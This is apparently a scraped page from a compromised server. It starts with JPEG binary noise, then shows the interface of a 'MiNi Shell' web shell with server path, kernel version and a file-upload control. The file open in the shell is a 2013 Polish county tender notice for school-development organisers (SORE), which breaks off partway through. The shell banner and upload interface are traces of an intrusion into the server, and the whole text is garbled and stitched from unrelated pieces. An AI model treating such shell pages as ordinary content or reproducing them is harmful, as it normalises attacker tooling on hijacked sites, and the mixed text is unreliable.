JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131028/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131028/225987-N-2013.html

<p class="kh_header"><b>Pszczyna: Pełnienie funkcji Szkolnego Organizatora Rozwoju Edukacji
w Projekcie pn. Wsparcie rozwoju szkół z powiatu pszczyńskiego - Wdrożenie nowatorskiego systemu doskonalenia nauczycieli.</b><br>
<b>Numer ogłoszenia: 225987 - 2013; data zamieszczenia: 28.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Pszczyński , ul. 3 Maja 10, 43-200 Pszczyna, woj. śląskie, tel. 032 4492300, 032 4492399, faks 032 4492345.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.pszczyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Szkolnego Organizatora Rozwoju Edukacji
w Projekcie pn. Wsparcie rozwoju szkół z powiatu pszczyńskiego - Wdrożenie nowatorskiego systemu doskonalenia nauczycieli..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Pełnienie funkcji Szkolnego Organizatora Rozwoju Edukacji (SORE) w Projekcie pn.Wsparcie rozwoju szkół z powiatu pszczyńskiego - Wdrożenie nowatorskiego systemu doskonalenia nauczycieli, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, realizowanego z Działania 3.5 Kompleksowe wspomaganie rozwoju szkół Programu Operacyjnego Kapitał Ludzki.	Ze względu na charakter usługi całość zamówienia podzielono na pięć odrębnych części, dopuszczając możliwość ubiegania się o każdą z części zamówienia z osobna:CZĘŚĆ I:	PRZEDSZKOLA, obejmuje wykonanie usługi w następujących 2 placówkach oświatowych:a.Przedszkole Publiczne nr 13 w Zespole Szkolno - Przedszkolnym w Łące, 43-241 Łąka, ul. Fitelberga 1;b.Przedszkole Publiczne nr 17 w Zespole Szkolno - Przedszkolnym w Piasku, 43-241 Piasek, ul. Szkolna 2 CZĘŚĆ II: SZKOŁY PODSTAWOWE GRUPA A obejmuje wykonanie usługi w następujących 3 placówkach oświatowych:a.Szkoła Podstawowa nr 1 im. Książąt Pszczyńskich, 43-200 Pszczyna ul. Bogedaina 1;b.Szkoła Podstawowa nr 16 w Studzienicach, 43-215 Studzienice, ul. Ks. Szewczyka 74;c.	Szkoła Podstawowa im. Kornela Makuszyńskiego w Golasowicach, 43-252 Golasowice ul. Z. Nałkowskiej 2.
CZĘŚĆ III: SZKOŁY PODSTAWOWE GRUPA B obejmuje wykonanie usługi w następujących 2 placówkach oświatowych:a.Szkoła Podstawowa im. Janusza Korczaka w Suszcu, 43-267 Suszec, ul. Szkolna 130;b.Szkoła Podstawowa im. Adama Mickiewicza w Kobielicach, 43-262 Kobielice, ul. Topolowa 61;CZĘŚĆ IV: GIMNAZJA obejmuje wykonanie usługi w następujących 3 placówkach oświatowych:
a.Publiczne Gimnazjum nr 1 w Pszczynie 43-200 Pszczyna ul. St. Batorego 24.
b.Publiczne Gimnazjum nr 2 w Pawłowicach, 43-251 Pawłowice ul. J. Pukowca 4.
c.Gimnazjum nr 1 im. Ks. Tomasza Wuwera, 43-251 Pawłowice, ul. Szkolna 1.
CZĘŚĆ V: SZKOŁY ŚREDNIE obejmuje wykonanie usługi w następujących 3 placówkach oświatowych:a.Zespół Szkół Ogólnokształcących im. Jana Pawła II w Pawłowicach 43-251 Pawłowice  ul. J. Pukowca 5;b.Zespół Szkół Zawodowych i Ogólnokształcących w Woli, 43-225 Wola ul. Poprzeczna 1a; c.Powiatowy Zespół Szkół nr 2 im. Karola Miarki - Technikum nr 3, 43-200 Pszczyna ul. Szymanowskiego 12;Beneficjentem projektu jest Powiat Pszczyński, a Realizatorem bezpośrednim projektu jest Poradnia Psychologiczno - Pedagogiczna w Pszczynie. Szkolny Organizator Rozwoju Edukacji (SORE) jest zewnętrznym specjalistą, który będzie pracował na rzecz placówek oświatowych (szkół lub przedszkoli), zgodnie ze złożoną ofertą w ramach realizowanego Projektu.	Głównym celem Projektu jest wdrożenie do dnia 31 sierpnia 2015 roku nowatorskiego systemu doskonalenia nauczycieli, który będzie odpowiadał na zdiagnozowane indywidualne potrzeby jednostek oświatowych z powiatu pszczyńskiego.Szacunkowa ilość godzin pracy w ramach umowy dla każdego SORE wynosi:82 godziny zegarowe na jedną placówkę edukacyjną w okresie od dnia podpisania umowy do 31.08.2014 roku.	Miejsce realizacji usługi: Biuro projektu oraz szkoły/przedszkola wskazane w danej części oferty lub też miejsce wybrane przez Wykonawcę.Osoba wyłoniona w przetargu do pełnienia funkcji SORE w danej części zamówienia, o których mowa w rozdziale III SIWZ nie może być pracownikiem placówek wskazanych w opisie tej części. Głównym zadaniem SORE jest wspieranie dyrektora i nauczycieli w przygotowaniu i realizacji rocznego planu wspomagania na podstawie wybranej przez szkołę/przedszkole oferty doskonalenia (przygotowanej w ramach projektu pn. Wsparcie rozwoju szkół z powiatu pszczyńskiego - Wdrożenie nowatorskiego systemu doskonalenia nauczycieli). Szkolny Organizator Rozwoju Edukacji wspiera szkołę/przedszkole i dyrektora, radę pedagogiczną towarzysząc oraz służąc pomocą na kolejnych etapach przygotowania i realizacji rocznego planu wspomagania. SORE nawiązuje kontakt ze szkołą przedszkolem w okresie do 4 dni kalendarzowych od daty podpisania umowy, buduje relacje z dyrektorem i radą pedagogiczną. Współpracuje z dyrektorem i radą pedagogiczną w przeprowadzeniu diagnozy i konstruowaniu rocznego planu wspomagania, opracowuje zapisy dokumentu rocznego planu wspomagania. Odpowiada za prawidłową organizację działań związanych z zewnętrznym wspomaganiem. Pozostaje w stałym kontakcie z dyrektorem i pracownikami zaangażowanymi w realizację rocznego planu wspomagania (RPW) w szkole/przedszkolu. Wspiera nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur. Swoje działania realizuje bezpośrednio w szkole/ przedszkolu, które wspiera, jak również w biurze projektu lub w wybranym przez siebie miejscu. SORE opracowuje niezbędną dokumentację związaną z realizacją projektu, w tym Roczny Plan Wspomagania dla danej placówki, na rzecz której pracuje.Szczegółowy opis poszczególnych części przedmiotu zamówienia pn. Orientacyjny harmonogram obowiązków SORE zawiera załącznik nr 1 do SIWZ dla każdej części zamówienia z osobna.	Zamawiający nie wyraża zgody, aby Wykonawca w trakcie wypełniania obowiązków stanowiących przedmiot zamówienia, wykonywał w danych placówkach oświatowych lub w biurze projektu innych czynności, niezwiązanych z wykonaniem przedmiotu zamówienia, pod rygorem rozwiązania umowy przez Zamawiającego. Zamawiający zastrzega, że osoba wyłoniona w postępowaniu do pełnienia funkcji SORE z ramienia Wykonawcy w danej części nie może być pracownikiem placówek (szkoły lub przedszkola) wskazanych w opisie tej części zamówienia. Zamawiający zastrzega, że łączna liczba godzin osoby wykonującej usługę, wynikająca z wykonywania wszystkich zadań w ramach innych projektów finansowanych w ramach Programu Operacyjnego Kapitał Ludzki, jak również wykonywanych w ramach innych programów Narodowych Strategicznych Ram Odniesienia nie może przekroczyć 240 godzin zegarowych miesięcznie. 
W przypadku udzielenia zamówienia Wykonawcom, o których mowa w art. 23 ust. 1 ustawy PZP, Zamawiający, przed podpisaniem umowy, wymaga przedłożenia umowy regulującej współpracę Wykonawców. Wartość zamówienia nie przekracza kwot określonych w przepisach wydanych na podstawie  art. 11 ust. 8 ustawy Prawo Zamówień Publicznych.	Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu  zakupów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego opisu warunku w tym zakresie. Zamawiający żąda	złożenia oświadczenia z art.	22 ust.1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego opisu warunku w tym zakresie. Zamawiający żąda	złożenia oświadczenia z art.	22 ust.1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły:spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego opisu warunku w tym zakresie. Zamawiający żąda	złożenia oświadczenia z art.	22 ust.1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi  do wykonania zamówienia (art. 22 ust.1 pkt 3 ustawy PZP), Zamawiający wymaga złożenia następujących dokumentów: Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia w  szczególności odpowiedzialnych za świadczenie usługi wraz z informacjami na tematach kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (załącznik Nr 7 do SIWZ). Warunek minimalny Zamawiającego: o zamówienie może ubiegać się wykonawca, który dysponuje lub będzie dysponował osobami posiadającymi niżej opisane kwalifikacje tj.:a.posiadają wykształcenie wyższe II stopnia z przygotowaniem pedagogicznym,b.	posiadającą doświadczenie w pracy z grupą osób dorosłych np. w moderowaniu grupowej pracy koncepcyjnej osób dorosłych, kierowanie spotkaniami poświęconymi zespołowemu wypracowaniu rozwiązań określonych problemów środowiska oświatowego (prowadzenie warsztatów, szkoleń np. z radami pedagogicznymi, nauczycielami, pracownikami oświatowymi, tworzenie procedur) w wymiarze co najmniej 80 godzin pracy z grupami dorosłymi,
c.	posiadającą minimum roczne doświadczenie w edukacji, w tym doświadczenie 
w pracy nauczyciela lub realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej, d.posiadającą przygotowanie do pracy moderatora (np. TERM, ukończone kursy lub studia przygotowujące do pracy trenera, edukatora, moderatora, coacha lub posiadają certyfikat trenerski, edukatorski lub ukończony kurs na SORE). Jeżeli wykonawca wykazując spełnianie warunku, o którym mowa wyżej polega na zasobach   innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy PZP, które to podmioty będą brały udział w realizacji  zamówienia, Zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów pisemnego zobowiązania. Wymagane jest załączenie do oferty odpowiednio  załączników  7a do SIWZ - Oświadczenie innego podmiotu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego opisu warunku w tym zakresie. Zamawiający żąda	złożenia oświadczenia z art.	22 ust.1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne oświadczenia i dokumenty, których przedłożenia w ofercie żąda Zamawiający: 
a.wypełniony Formularz ofertowy -  załącznik nr 2 do SIWZ.b.pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej).
c.Oświadczenie dotyczące podwykonawstwa, zgodnie z załącznikiem nr 3 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie - 50</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiany do umowy możliwe są jedynie w trybie art. 144 ustawy PZP. Uzgodnienia w tym zakresie wymagają dla swej ważności zatwierdzenia przez Zamawiającego, a zmiana umowy może nastąpić jedynie na piśmie w formie aneksu pod rygorem nieważności.2.Zamawiający dopuszcza możliwość zmiany umów/umowy w następujących okolicznościach:a.rezygnacji Zamawiającego z wykonania części usługi z jednoczesnym ograniczeniem (obniżeniem) wynagrodzenia wykonawcy,
b.ustawowej zmiany przepisów podatkowych, np. zmiany stawki podatku VAT
c.działania siły wyższej, zdarzeń losowych niezależnych od stron umowy,
d.poprawy oczywistej omyłki,e.zmiany terminu realizacji zamówienia spowodowanej przerwami w realizacji usługi powstałymi z przyczyn nie leżących po stronie Wykonawcy;f.pisemnego uzgodnienia pomiędzy Stronami dotyczącego skróceniu terminu zakończenia realizacji umowy;g.zmiany nazw, siedziby stron umowy, numerów kont bankowych, innych danych identyfikacyjnych;h.zmiany lub wprowadzenia podwykonawcy, zmiany lub wprowadzenia osoby/ osób uczestniczących w wykonywaniu zamówienia  (realizujących zamówienie) pod warunkiem odpowiedniego zgłoszenia i po akceptacji przez Zamawiającego;i.zmiany osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy; j.zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,k.	konieczności wprowadzenia zmian będących następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki, 
l.kiedy wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony umowy.
m.w ramach istotnych zmian zastrzega się prawo zmiany załącznika nr 1 do umowy 
w trakcie wykonywania usługi - orientacyjny harmonogram realizacji obowiązków SORE w zakresie terminów wykonania i liczby godzin, ale w taki sposób aby nie przekroczyć limitu godzinowego określonego w umowie i ofercie wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.powiat.pszczyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pszczynie,parter pok 5 Wydział Zamówień Publicznych lub przesyłką pocztową (poleconą) na adres: Starostwo Powiatowe w 
Pszczynie, ul. 3 Maja 10, 43-200 Pszczyna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Pszczynie, I piętro pok. 35 Sekretariat lub przesyłką pocztową (poleconą) na adres: Starostwo Powiatowe w Pszczynie, ul. 3 Maja 10, 43-200 Pszczyna..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Wsparcie rozwoju szkół z powiatu pszczyńskiego - Wdrożenie nowatorskiego systemu doskonalenia nauczycieli współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego - Priorytet III Wysoka jakość systemu oświaty - Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ 1. PRZEDSZKOLA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obowiązki SORE realizowane na rzecz  placówki edukacyjnej:
spotkanie z dyrektorem placówki, pomoc dyrektorowi w zdiagnozowaniu potrzeb placówki, omówieni e zasad projektu itp.
spotkanie i współpraca z radą pedagogiczną, pomoc w formułowaniu celów, zdiagnozowanie potrzeb i określenie obszaru do rozwoju, wstępne rozpoznanie ofert doskonalenia, wybór zespołu zadaniowego do wypracowania ostatecznych założeń Rocznego Planu Wspomagania   
wsparcie placówki w przygotowaniu założeń Rocznego Planu Wspomagania, ściśle odpowiadającego na potrzeby placówki, zbudowanego na podstawie jednej wybranej oferty doskonalenia, przeprowadzenie warsztatu diagnostyczno-rozwojowego wraz z zespołem zadaniowym
Opracowanie dokumentu Rocznego Planu Wspomagania dla placówki na rok szkolny 2013/2014 zgodnie z wypracowanymi przez zespół zadaniowy założeniami oraz przedłożenie do biura projektu i placówki 
wsparcie przy zapewnianiu obiegu informacji pomiędzy placówką uczestniczącą w projekcie -biurem projektu -SORE (stały kontakt z osobami zaangażowanymi w realizację Rocznego Planu Wspomagania w placówce, dbanie 
o przepływ informacji dotyczących działań podejmowanych w ramach jego współpracy
wnioskowanie o pozyskanie zewnętrznych ekspertów, przedstawienie rekomendacji itp. (jeśli zaistnieje taka potrzeba)
organizowanie zaplanowanych form wspomagania, doskonalenia w zakresie ustalania terminów szkoleń/warsztatów zajęć doskonalących itp. - we współpracy z placówką oraz pracownikami biura projektu
organizacja systemu wsparcia dla pracowników placówki we wdrażaniu nowo nabytych umiejętności i wypracowanych procedur (np. ustalanie terminów konsultacji, zajęć indywidualnych, we współpracy z placówką, Wykonawcami oraz pracownikami biura projektu 
monitorowanie przebiegu realizacji Rocznego Planu Wspomagania w danej placówce, reagowanie na pojawiające się trudności, przekazywanie informacji do biura projektu 
dokumentowanie podejmowanych działań,
przeprowadzenie wśród uczestników projektu ankiet z przebiegu zajęć, realizacji Rocznego Planu Wspomagania itp.
współpraca z radą pedagogiczną nad rekomendacjami do pracy placówki w kolejnym roku szkolnym, przygotowanie sprawozdania z przebiegu realizacji Rocznego Planu Wspomagania, 
przedstawienie sprawozdania z przebiegu realizacji RPW dyrektorowi placówki oraz radzie pedagogicznej, udział w spotkaniu podsumowującym realizację Rocznego Planu Wspomagania
ścisła współpraca z kierownikiem projektu, pracownikami biura projektu, udział 
w spotkaniach SORE w biurze projektu opracowywanie i dostarczanie dokumentów rozliczeniowych do biura projektu. Łączna liczba godzin wynosi 164 godziny zegarowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ 2. SZKOŁY PODSTAWOWE GRUPA A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obowiązki SORE realizowane na rzecz  placówki edukacyjnej: 
spotkanie z dyrektorem placówki, pomoc dyrektorowi w zdiagnozowaniu potrzeb placówki, omówieni e zasad projektu itp.
